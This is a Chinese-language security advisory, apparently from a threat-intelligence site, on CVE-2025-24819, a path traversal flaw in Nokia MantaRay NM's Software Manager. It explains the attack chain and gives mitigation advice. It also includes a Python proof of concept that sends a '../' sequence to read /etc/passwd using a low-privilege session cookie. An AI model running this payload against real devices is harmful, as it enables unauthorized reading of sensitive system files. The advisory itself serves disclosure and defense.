CVE-2025-24819 CVSS 5.7 中危

CVE-2025-24819 Nokia MantaRay NM相对路径遍历漏洞

披露日期: 2026-04-07

来源: b48c3b8f-639e-4c16-8725-497bc411dad0

漏洞信息

漏洞编号

CVE-2025-24819

漏洞类型

路径遍历

CVSS评分

5.7 中危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nokia MantaRay NM

漏洞概述

Nokia MantaRay NM网络管理设备中的Software Manager应用程序存在相对路径遍历漏洞。由于系统对文件系统输入参数的验证机制不完善，经过身份认证的攻击者可以利用该缺陷，通过构造特殊的请求遍历目录结构，进而读取服务器上的敏感文件。该漏洞可能导致机密信息泄露，CVSS v3.1评分为5.7，属于中危级别。

技术细节

该漏洞的核心在于Nokia MantaRay NM设备Software Manager应用未正确处理用户输入的文件路径参数。攻击者无需复杂的用户交互（UI:N），只需具备邻接网络访问权限（AV:A）和低权限账户（PR:L），即可发起攻击。利用方式是通过在HTTP请求中插入“../”或类似序列，改变文件读取的预期路径，从而访问Web根目录之外的文件。这种相对路径遍历攻击使得攻击者能够获取系统配置文件、日志或其他敏感数据，造成高机密性风险（C:H）。尽管该漏洞不影响系统的完整性和可用性，但信息泄露可能为进一步的攻击提供便利。具体而言，漏洞可能存在于文件下载或预览功能的API接口中。由于缺乏对路径字符的规范化处理，应用程序未能将用户输入限制在预定义的安全目录内，攻击者通过迭代遍历父目录，最终定位到系统关键文件。

攻击链分析

STEP 1

侦察

攻击者识别网络中存在的Nokia MantaRay NM设备，并确定其Software Manager应用的接口。

STEP 2

获取访问权限

攻击者利用获取到的低权限账户（PR:L）凭证登录设备，或者利用设备存在的默认凭证。

STEP 3

漏洞利用

攻击者向易受攻击的接口发送特制的HTTP请求，在文件路径参数中注入“../”序列，实施目录遍历攻击。

STEP 4

数据窃取

成功绕过路径限制后，攻击者读取系统敏感文件（如/etc/passwd、配置文件等），导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL structure example (adjust based on actual environment)
target_url = "http://<target-ip>/software-manager/api/file"

# The vulnerable parameter is assumed to be 'filename' or 'path'
# Payload using relative path traversal to read /etc/passwd
payload = {
    "filename": "../../../../../../../../etc/passwd"
}

# Attacker needs low-privilege credentials (cookies or auth headers)
headers = {
    "Cookie": "session_id=low_priv_user_session_token"
}

try:
    print(f"[*] Sending payload to {target_url}...")
    response = requests.get(target_url, params=payload, headers=headers, timeout=10)

    if response.status_code == 200:
        print("[+] Potential exploit successful!")
        print("[+] Response content:")
        print(response.text[:500]) # Print first 500 chars
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Nokia MantaRay NM (具体受影响版本请参考Nokia官方安全公告)

防御指南

临时缓解措施

在未安装补丁前，建议通过防火墙或ACL策略严格限制对Nokia MantaRay NM设备Software Manager接口的访问源，仅允许可信的管理IP进行连接。同时，应加强对系统日志的监控与审计，及时发现异常的文件读取请求行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表